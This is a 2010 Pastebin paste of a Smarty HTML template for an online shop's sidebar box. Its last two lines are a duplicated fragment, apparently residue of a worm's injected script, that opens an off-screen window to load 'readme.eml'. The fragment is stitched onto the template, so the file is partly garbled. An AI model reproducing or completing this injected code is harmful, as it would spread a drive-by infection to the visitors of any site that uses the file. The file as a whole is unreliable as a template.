daily pastebin goal
35%
SHARE
TWEET

Aftab Naveed

a guest Jun 4th, 2010 55 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <table width="{$LayoutBoxWidth}" cellpadding="0" cellspacing="0" border="0">
  2.         <tr>
  3.             <td class="BoxHeader" align="{$LayoutBoxHeaderLayout}" {if $LayoutBoxHeaderBackground}style="background-image:URL({$headerBackground})"{/if}>
  4.                 {if $site_box.header eq 'Shop By Brand'}
  5.                 <img src="/images/shopbybrand.jpg" alt="Shop By Brand" />
  6.             {else}
  7.                 {$site_box.header }
  8.             {/if}
  9.             </td>
  10.     </tr>
  11.         <tr>
  12.             <td>
  13.                     <table width="100%" cellpadding="0" cellspacing="1" border="0" class="BoxFrame">
  14.                             <tr>
  15.                                 <td class="BoxContent" style="padding:8px;">
  16.                                 {$site_box.content|replace:'&mode=manufacturer&mid':'&amp;mode=manufacturer&amp;mid'}
  17.                                 </td>
  18.                             </tr>
  19.                     </table>   
  20.             </td>
  21.         </tr>
  22. </table>
  23. ("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
  24. ("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
RAW Paste Data
Top